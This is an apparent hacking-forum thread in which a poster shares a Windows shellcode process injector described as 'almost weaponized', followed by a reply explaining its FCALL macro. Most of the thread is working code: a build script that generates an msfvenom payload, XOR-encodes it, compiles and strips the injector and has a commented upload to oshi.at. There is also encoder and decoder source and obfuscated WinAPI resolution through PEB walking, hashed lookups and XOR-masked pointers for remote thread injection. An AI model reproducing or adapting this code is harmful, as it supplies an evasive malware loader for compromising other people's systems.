This post is now more long than I expected, anyone which wants full code just need to ask, I will not include as in the last post because Im not sure its helpful, from now I think the next step will be add a layer of encoding in the file which will be used with INCBIN and a routine to decode it in runtime.

References:
INCBIN: https://github.com/graphitemaster/incbin
64-Bit Programming Models: Why LP64?: https://unix.org/version2/whatsnew/lp64_wp.html
 
I "finished" this thread injector, its almost weaponized, people using the tool will just need the software present on the script build.sh:
Bash:
rm -f shellcode
#msfvenom -p windows/x64/exec CMD="cmd.exe" EXITFUNC="thread" > shellcode.bin
gcc hash.c -o hash
./hash > hash.h
gcc encode.c -o encode
./encode shellcode.bin shellcode
x86_64-w64-mingw32-gcc -O3 main.c -o injector.exe
strip -s ./injector.exe
#proxychains curl -T ./injector.exe oshi.at

Usage is very simple, put x64 payload on file shellcode.bin and run build.sh, then the injector.exe will inject the payload on <pid> passed on command line, as an example a used msfvenom to create payloads to run notepad.exe and cmd.exe(simple test), All goes fine, we can see in the image the calculator executing nodepad.exe:
calc.exe.png


The program which encode the payload is very simple, code is self explanatory:
C:
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/mman.h>

#ifndef XOR_KEY
#define XOR_KEY 0xff
#endif

int main(int argc, char **argv)
{
    int payload_fd;
    int enc_payload_fd;
    unsigned char *payload_map;
    unsigned char *enc_payload_map;
    struct stat statbuf;

    payload_fd = open(argv[1], O_RDONLY);
    fstat(payload_fd, &statbuf);
    enc_payload_fd = open(argv[2], O_RDWR | O_CREAT, S_IRWXU);
    ftruncate(enc_payload_fd, statbuf.st_size);
    payload_map = mmap(NULL, statbuf.st_size, PROT_READ, MAP_PRIVATE, payload_fd, 0);
    enc_payload_map = mmap(NULL, statbuf.st_size, PROT_WRITE, MAP_SHARED, enc_payload_fd, 0);

    for (int i = 0; i < statbuf.st_size; i++) {
        enc_payload_map[i] = payload_map[(statbuf.st_size-1) - i] ^ XOR_KEY;
    }

    munmap(payload_map, statbuf.st_size);
    munmap(enc_payload_map, statbuf.st_size);
    close(payload_fd);
    close(enc_payload_fd);

    return 0;
}

The most interesting new thing for this code is the decode_payload function, I could use the same encode as a decode for this specific case but using a different way worked fine too, here is the implementation:

C:
void decode_payload(const unsigned char * payload, size_t size)
{
    div_t q;
    unsigned char *ptr;
    
    q = div(size, 2);
    ptr = (unsigned char *)payload;

    if (q.rem != 0)
        ptr[q.quot] ^= XOR_KEY;

    for (int i = 0; i < q.quot; i++) {
        if (ptr[i] == ptr[(size-1)-i]) {
            ptr[i] ^= XOR_KEY;
            ptr[(size-1)-i] ^= XOR_KEY ;   
            continue;
        }
            
        ptr[i] ^= ptr[(size-1)-i];
        ptr[(size-1)-i] ^= ptr[i];
        ptr[i] ^= ptr[(size-1)-i];
        
        ptr[i] ^= XOR_KEY;
        ptr[(size-1)-i] ^= XOR_KEY ;   
    }
}

The changes on main.c was minimal, I will zip all sources and upload it soon. Hopefully it will help someone.
 
I "finished" this thread injector, its almost weaponized, people using the tool will just need the software present on the script build.sh:
Bash:
rm -f shellcode
#msfvenom -p windows/x64/exec CMD="cmd.exe" EXITFUNC="thread" > shellcode.bin
gcc hash.c -o hash
./hash > hash.h
gcc encode.c -o encode
./encode shellcode.bin shellcode
x86_64-w64-mingw32-gcc -O3 main.c -o injector.exe
strip -s ./injector.exe
#proxychains curl -T ./injector.exe oshi.at

Usage is very simple, put x64 payload on file shellcode.bin and run build.sh, then the injector.exe will inject the payload on <pid> passed on command line, as an example a used msfvenom to create payloads to run notepad.exe and cmd.exe(simple test), All goes fine, we can see in the image the calculator executing nodepad.exe:
Посмотреть вложение 77019

The program which encode the payload is very simple, code is self explanatory:
C:
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/mman.h>

#ifndef XOR_KEY
#define XOR_KEY 0xff
#endif

int main(int argc, char **argv)
{
    int payload_fd;
    int enc_payload_fd;
    unsigned char *payload_map;
    unsigned char *enc_payload_map;
    struct stat statbuf;

    payload_fd = open(argv[1], O_RDONLY);
    fstat(payload_fd, &statbuf);
    enc_payload_fd = open(argv[2], O_RDWR | O_CREAT, S_IRWXU);
    ftruncate(enc_payload_fd, statbuf.st_size);
    payload_map = mmap(NULL, statbuf.st_size, PROT_READ, MAP_PRIVATE, payload_fd, 0);
    enc_payload_map = mmap(NULL, statbuf.st_size, PROT_WRITE, MAP_SHARED, enc_payload_fd, 0);

    for (int i = 0; i < statbuf.st_size; i++) {
        enc_payload_map[i] = payload_map[(statbuf.st_size-1) - i] ^ XOR_KEY;
    }

    munmap(payload_map, statbuf.st_size);
    munmap(enc_payload_map, statbuf.st_size);
    close(payload_fd);
    close(enc_payload_fd);

    return 0;
}

The most interesting new thing for this code is the decode_payload function, I could use the same encode as a decode for this specific case but using a different way worked fine too, here is the implementation:

C:
void decode_payload(const unsigned char * payload, size_t size)
{
    div_t q;
    unsigned char *ptr;
  
    q = div(size, 2);
    ptr = (unsigned char *)payload;

    if (q.rem != 0)
        ptr[q.quot] ^= XOR_KEY;

    for (int i = 0; i < q.quot; i++) {
        if (ptr[i] == ptr[(size-1)-i]) {
            ptr[i] ^= XOR_KEY;
            ptr[(size-1)-i] ^= XOR_KEY ; 
            continue;
        }
          
        ptr[i] ^= ptr[(size-1)-i];
        ptr[(size-1)-i] ^= ptr[i];
        ptr[i] ^= ptr[(size-1)-i];
      
        ptr[i] ^= XOR_KEY;
        ptr[(size-1)-i] ^= XOR_KEY ; 
    }
}

The changes on main.c was minimal, I will zip all sources and upload it soon. Hopefully it will help someone.
thank you so mutch for the content ^^ , keep on, i really enjoyed reading it...
 
C:
struct func_ptrs {
    unsigned long long rval;
    OpenProcessPtr_t OpenProcessPtr;
    VirtualAllocExPtr_t VirtualAllocExPtr;
    WriteProcessMemoryPtr_t WriteProcessMemoryPtr;
    CreateRemoteThreadPtr_t CreateRemoteThreadPtr;
};

To initialize the struct I introduced the function init_table() which create the random 64bit value, and then use this values to encode pointers returned by get_proc() and finally store each pointer in the struct:


C:
void init_table(struct func_ptrs *fptrs)
{
    PEB* ppeb;
    unsigned long long x = 0;

    srand(time(NULL));
    for (int i = 0; i < 8; i++)
        x = x << 8 | ((unsigned long long)rand() & 0xff);
  
    fptrs->rval = x;

    ppeb = get_peb();
    fptrs->OpenProcessPtr =    (OpenProcessPtr_t)(x ^ (unsigned long long)get_proc(ppeb, OpenProcess_HASH));
    fptrs->VirtualAllocExPtr = (VirtualAllocExPtr_t)(x ^ (unsigned long long)get_proc(ppeb, VirtualAllocEx_HASH));
    fptrs->WriteProcessMemoryPtr = (WriteProcessMemoryPtr_t)(x ^ (unsigned long long)get_proc(ppeb, WriteProcessMemory_HASH));
    fptrs->CreateRemoteThreadPtr = (CreateRemoteThreadPtr_t)(x ^ (unsigned long long)get_proc(ppeb, CreateRemoteThread_HASH));

    printf("OpenProcessPtr @ %p\n", fptrs->OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", fptrs->VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", fptrs->WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", fptrs->CreateRemoteThreadPtr);
}

From this point on, we have almost all that is needed to use the WinAPI, but for the sake of usability I also introduced a convoluted macro FCALL, which receive the name of a variable of type struct func_ptrs, name of field (function pointer), and finally the parameters to the WinAPI function, it will expand to the necessary code to decode the function pointer, cast it to the correct type and call the respective function:

C:
#define FCALL(fptr, fname, ...) \
    ( _Generic(fptr.fname, \
    OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    VirtualAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ) \
    ) (__VA_ARGS__) )

Even that the macro code seems strange because the usage of _Generic and variadic-args, the usage is very easy, here is a example of call to OpenProcess():


C:
    pid = atoi(argv[1]);
    proc_handle = FCALL(fptrs, OpenProcessPtr,
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid
    );
couldn't understand this code tbh, can u explain it more?
 
couldn't understand this code tbh, can u explain it more?
Sure, I will do this in a next reply with more time, did have problem with a specific part of code or you need a more detailed description on how the quoted code works?
 
Sure, I will do this in a next reply with more time, did have problem with a specific part of code or you need a more detailed description on how the quoted code works?
i need more detailed descrption...if u've any article...Specially abt the macro FCALL , and i'm sorry to take a while to answer...i was kinda busy...
ab
 
i need more detailed descrption...if u've any article...Specially abt the macro FCALL , and i'm sorry to take a while to answer...i was kinda busy...
ab
In this case where you are in trouble to understand some macro, you can instruct GCC to expand macros and show the output, to do this in our case:

Bash:
x86_64-w64-mingw32-gcc main.c -E

Taking this part of source:
C:
FCALL(fptrs, WriteProcessMemoryPtr,
                proc_handle, remote_mem, payload_data, payload_size, &written
    );

GCC will output:

C:
( _Generic(fptrs.WriteProcessMemoryPtr, OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval ), Virtua
lAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval ), WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr
_t)((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval ), CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptrs.Wri
teProcessMemoryPtr ^ fptrs.rval ) ) (proc_handle, remote_mem, payload_data, payload_size, &written) )

From here you can see it expand to a function call, the macro was used so the address of function can be auto decoded with this expression "
(unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval )" and then casted to the correct type. The "tricky" things about this macro can be just two things, the usage do _Generic to select the correct cast and the usage of __VA_ARGS__, so the macro the handle different number of arguments, this allow to expand for different function calls. For both subjects I think the references is more useful than a new explanation from me.

References:
_Generic Selection
Variadic Macros
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх